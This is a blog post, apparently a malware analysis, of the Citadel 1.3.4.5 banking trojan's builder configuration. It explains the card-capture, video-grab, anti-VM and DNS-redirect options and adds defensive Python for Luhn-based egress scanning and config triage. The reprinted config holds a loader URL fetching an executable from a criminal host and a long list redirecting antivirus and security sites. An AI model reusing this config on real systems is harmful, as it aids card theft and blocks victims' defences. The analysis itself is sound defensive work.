Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-38267025192176061282012-09-18T15:27:00.000-07:002012-09-18T15:27:01.494-07:00Configuration file of the Citadel Builder 1.3.4.5 trojan<br />
<div class="MsoNormal">
<span style="font-family: Arial;">This document presents the configuration file used by the Citadel trojan, successor of the famous Zeus banking trojan, which is used to build the malicious binary that will infect users and then communicate with the server hosting the whole criminal infrastructure.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Among the new features of this version, its modular configuration stands out, which depends on the add-ons bought on the black market.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">One of these modules is CardSwipe (magnetic stripe), whose purpose is to capture all the credit card data needed to operate fraudulently with the cards.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">In this configuration file the criminals have this option enabled:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">enable_luhn10_get 1</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">enable_luhn10_post 1</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">It was even possible to reproduce the injection the trojan performs on the infected machine, capturing the screen it presents so that the user enters all of his credit card data when accessing online banking.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-QMS2kG7KC60/UFjYRmWhoLI/AAAAAAAAALI/jnBb41xvl8w/s1600/inject.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://1.bp.blogspot.com/-QMS2kG7KC60/UFjYRmWhoLI/AAAAAAAAALI/jnBb41xvl8w/s400/inject.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Note how it asks for the secret PIN number (ATM PIN) and the Social Security Number (SSN), data that is never requested from the customer under any circumstances.</span></div>
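<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">The Luhn-10 filter above is what lets the bot keep only form fields that hold a real card number; the same check, run at an egress proxy or in a DLP rule, flags the requests a defender should review. The following is an added example written for this page, not Citadel code or the author's: it scans the GET query and POST body of a request for Luhn-valid card numbers and also flags the PIN and SSN field names the injected form asks for; the sensitive field list and the sample requests are constructed.</span></div>

```python
"""Egress check for card data in HTTP form fields.

Added example for this page, not Citadel code. The builder options
enable_luhn10_get / enable_luhn10_post make the bot keep only GET or POST
data that contains a Luhn-valid card number; running the same test at an
egress proxy or in a DLP rule flags the requests a defender should review.
The sensitive field names and the sample requests below are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# 13 to 19 digits, optionally separated by single spaces or dashes,
# not glued to other digits on either side.
DIGIT_RUN = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# Field names a bank form never legitimately asks for (constructed list,
# based on the ATM PIN and SSN fields the injected form requests).
SENSITIVE_FIELDS = {"atmpin", "pin", "ssn"}


def luhn_valid(number):
    """Return True if the digits of `number` pass the Luhn-10 check."""
    digits = [int(c) for c in number if c.isdigit()]
    if not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Keep the first six and last four digits; never log a full PAN."""
    d = re.sub(r"\D", "", pan)
    return d[:6] + "*" * (len(d) - 10) + d[-4:]


def find_pans(text):
    """All Luhn-valid digit runs in `text`, masked."""
    return [mask_pan(m.group(0)) for m in DIGIT_RUN.finditer(text)
            if luhn_valid(m.group(0))]


def scan_request(method, url, body=""):
    """Inspect one request the way the bot's luhn10 filter does, but for
    the defender: report masked PANs per field and any sensitive fields."""
    if method.upper() == "GET":
        location, fields = "query", parse_qsl(urlsplit(url).query)
    else:
        location, fields = "body", parse_qsl(body)
    pans, sensitive = [], []
    for name, value in fields:
        for masked in find_pans(value):
            pans.append((location, name, masked))
        if re.sub(r"[^a-z]", "", name.lower()) in SENSITIVE_FIELDS:
            sensitive.append(name)
    return {"pans": pans, "sensitive_fields": sensitive}


if __name__ == "__main__":
    # Constructed sample: a login POST carrying a public test card number,
    # an ATM PIN field and a non-Luhn order number that must not match.
    sample_body = ("user=alice&cardnumber=4111+1111+1111+1111"
                   "&atm_pin=1234&order=1234567890123456")
    print(scan_request("POST", "https://bank.example/login", sample_body))
```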
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Other configuration parameters allow video sequences to be captured from the infected machine:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">use_module_video 0</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">entry "Video"</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> quality 1</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> length 500</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">This is very useful for capturing, in real time, the sequence in which the user enters the secret transfer authorization codes, and for evading authentication systems based on virtual keyboards.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Other commands also allow capturing the data sent through the Chrome browser, enabling protection against virtual machines (that is, preventing the binary from being analysed in such environments), disabling the sending of cookies, and blocking access to the websites of antivirus and anti-malware companies by redirecting the user to Google's home page (209.85.229.104) every time he tries to reach them. To do this it does not modify the infected machine's hosts file; instead it controls the machine's DNS cache.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">It even blocks access to the websites of law-enforcement agencies and anti-cybercrime units.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6Zm8lZ5gsPc/UFjYXrUEozI/AAAAAAAAALQ/zny2fW0rEfU/s1600/hosts-policia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-6Zm8lZ5gsPc/UFjYXrUEozI/AAAAAAAAALQ/zny2fW0rEfU/s320/hosts-policia.jpg" width="320" /></a></div>
<div class="MsoNormal">
<br /></div>
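<div class="MsoNormal">
<span style="font-family: Arial;">The parser below is an added example, not code from this post or from the Citadel kit. It reads the builder configuration format reproduced further down (;-comments, key/value lines, nested entry blocks and the host=ip lines of DnsFilters) and reports which security sites are all being pointed at a single address, which is the part of that dump a defender wants to triage first. The sample configuration inside it is constructed in the shape of the page's dump, with placeholder hosts under .invalid.</span></div>

```python
"""Parser for the Citadel builder config format shown on this page.

Added example; not code from the blog post or from the Citadel kit.
It handles ';' comments, 'key value' lines, nested 'entry "Name" ... end'
blocks and the bare 'host=ip' lines used inside DnsFilters.
"""
import shlex
from collections import Counter

# Constructed sample in the shape of the page's dump; hosts under .invalid
# are placeholders, the redirect address is the one quoted in the post.
SAMPLE_CONFIG = r'''
;; Default config + updated AV's list (redirect to google.com)
entry "StaticConfig"
    botnet "main"
    timer_config 15 20
    url_config1 "http://config.example.invalid/game_install.bin"
    disable_httpgrabber 1
    antiemulation_enable 0
    use_module_video 0
end

entry "DynamicConfig"
    url_loader "http://config.example.invalid/bbbllasw.exe"
    file_webinjects "webinjects.txt"
    entry "WebFilters"
        "!http://*"
    end
    entry "DnsFilters"
        bitdefender.com=209.85.229.104
        update.avg.com=209.85.229.104
        virustotal.com=209.85.229.104
        krebsonsecurity.com=209.85.229.104
        malwarebytes.org=209.85.229.104
    end
end
'''


def parse_config(text):
    """Parse config text into nested dicts.

    Every 'entry "Name"' block becomes a dict stored under "Name"; 'key value'
    lines map key -> value (a list when several values follow); bare quoted
    lines such as WebFilters patterns are collected under "_items"; and
    'host=ip' lines map host -> ip.  Lines starting with ';' are comments.
    """
    root = {}
    stack = [root]
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line == "end":
            if len(stack) == 1:
                raise ValueError("'end' without a matching entry")
            stack.pop()
            continue
        tokens = shlex.split(line)
        block = stack[-1]
        if tokens[0] == "entry" and len(tokens) == 2:
            child = {}
            block[tokens[1]] = child
            stack.append(child)
        elif line.startswith('"'):
            # pattern line; keep all fields when the line carries several
            block.setdefault("_items", []).append(
                tokens if len(tokens) > 1 else tokens[0])
        elif len(tokens) == 1 and "=" in tokens[0]:
            host, _, ip = tokens[0].partition("=")
            block[host.lower()] = ip
        else:
            block[tokens[0]] = tokens[1] if len(tokens) == 2 else tokens[1:]
    if len(stack) != 1:
        raise ValueError("entry block never closed with 'end'")
    return root


def dns_filters(config):
    """Return the host -> ip map from DynamicConfig/DnsFilters ({} if absent)."""
    filters = config.get("DynamicConfig", {}).get("DnsFilters", {})
    return {h: ip for h, ip in filters.items() if h != "_items"}


def sinkhole_report(config):
    """Find the address most DnsFilters entries are pointed at.

    Returns (target_ip, sorted hosts redirected to it).  In the page's dump a
    single Google address swallows every lookup of antivirus, malware-research
    and law-enforcement sites, so this is a quick view of what the infected
    host can no longer reach.
    """
    mapping = dns_filters(config)
    if not mapping:
        return None, []
    target, _ = Counter(mapping.values()).most_common(1)[0]
    return target, sorted(h for h, ip in mapping.items() if ip == target)


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    ip, hosts = sinkhole_report(cfg)
    print(f"{len(hosts)} hosts redirected to {ip}:")
    for host in hosts:
        print("  " + host)
```

The dump on this page defangs URLs with spaces ("http : //"), so feed it through the parser only after restoring the original spelling or the URL values will split into several tokens.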
<div class="MsoNormal">
<span style="font-family: Arial;">Below we show the configuration of Citadel Builder 1.3.4.5:</span></div>
<pre>;; Default config + updated AV's list (redirect to google.com)
;; Citadel Builder 1.3.4.5
;; SHORT MANUAL BELOW ------------&gt;
;; url_config1 is required!!! url_config2 &amp; url_config3 are optional, you can setup it like a reserve config host.
;; report_software - report to gate about installed firewall,antivirus,software: 1 is enabled
;; disable_antivirus 0/1 - if you bought the MiniAV module, you can switch it off. 0 is enabled.
;; enable_luhn10_get 1/0 - if you bought the CardSwipe module, you can switch it on a GET parsing by LUHN10 algorithm.
;; enable_luhn10_post 1/0 - if you bought the CardSwipe module, you can switch it on a POST parsing by LUHN10 algorithm(en.wikipedia.org/wiki/Luhn_algorithm).
;; use_module_video 1/0 - Do you really want to use video grabber? If no, please switch it off. 1 is enabled.
;; disable_httpgrabber 1/0 - Do you want to switch off Chrome HTTP : // logs grabber? 1 is enabled.
;; package_max_size 50 - logs reports transmission size(KB), stay it as default.
;; timer_autoupdate 10 - Auto-update of exe file, specify time in hours. This option takes exe link from "url_loader" section.
;; antiemulation_enable 0/1 - if you enable it, you can't test it on virtual machines such as VMWare/Virtualbox.
;; disable_cookies 0/1 - if you setup 0, then cookies will send to your gate and .sol files will be deleted.
;; For other information please open the "Personal Manual"
;; IF YOU DON'T KNOW HOW TO SETUP THESE OPTIONS, YOU CAN USE OPTIMAL DEFAULT CONFIG.
;; &lt;------------------ END OF SHORT MANUAL.

entry "StaticConfig"
    botnet "main"
    timer_config 15 20
    timer_logs 7 20
    timer_stats 10 20
    timer_modules 7 10
    timer_autoupdate 8
    url_config1 "http : //gremlindefault.net/mainsession/game_install.bin"

    remove_certs 1
    ; disable_tcpserver 0
    disable_cookies 0
    disable_httpgrabber 1
    report_software 1
    disable_antivirus 0
    enable_luhn10_get 1
    enable_luhn10_post 1
    antiemulation_enable 0
    encryption_key "*******************************"
    use_module_video 0
end

entry "DynamicConfig"
    url_loader "http : //gremlindefault.net/mainsession/bbbllasw.exe"
    url_server "http : //gremlindefault.net/mainsession/redir.php"
    file_webinjects "webinjects.txt"
    entry "AdvancedConfigs"
        "http : //gremlindefault.net/mainsession/game_install.bin"
    end
    entry "WebFilters"
        "!http : //*"
    end
    entry "WebDataFilters"
        ;"http : //mail.rambler.ru/*" "passw;login"
    end
    entry "WebFakes"
        ;"http : //www.google.com" "http : //www.yahoo.com" "GP" "" ""
    end
    entry "DnsFilters"</pre>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wfbs51-p.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wfbs60-p.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">iau.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">licenseupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">csm-as.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wfbs6-icss-p.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">oc.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">backup.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">backup.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files2.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files2.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.cz.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.cz.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.com.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.com.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">data-cdn.mbamupdates.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">su.pctools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pctools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.lavasoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secure.lavasoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virustotal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.trendmicro.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securesoft.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avira.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gratissoftwaresite.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pandasecurity.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoft.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">symantec-norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">housecall.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pchelpforum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pchelpforum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.cnet.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">techsupportforum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gratissoftware.nu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">majorgeeks.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.pcworld.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.microbe.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avast.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg-antivirus.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nortonantiviruscenter.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">threatmetrix.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonealarm.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">firewallguide.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">auditmypc.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free-firewall.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">schoonepc.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">iopus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">tucows.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg-antivirus-plus-firewall.en.softonic.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">superantispyware.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">superantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">harveynorman.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ca-store.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">netfreighters.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securetec.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-spyware.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusscan.jotti.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virscan.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivir.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">analysis.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">hijackthis.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">uploadmalware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">emsisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kaspersky.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gdatasoftware.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pcpro.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cyprotect.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cloudantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb-antivir.it=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">escanav.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vergelijk.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirusvergelijk.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virussen.upc.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.startpagina.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avastav.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">defenx.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gdata.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">removevirus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">windows.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">answers.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">myantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">krebsonsecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.about.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cleanuninstall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">staples.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">esetindia.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee.free-trials.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivir-2012.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">panda-antivirus.en.softonic.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">softonic.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">freeantivirushelp.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">scanwith.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bestantivirusreviewed.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virus-help.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cleanallspyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kingsoftsecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">threatfire.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">freeavg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pcthreat.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
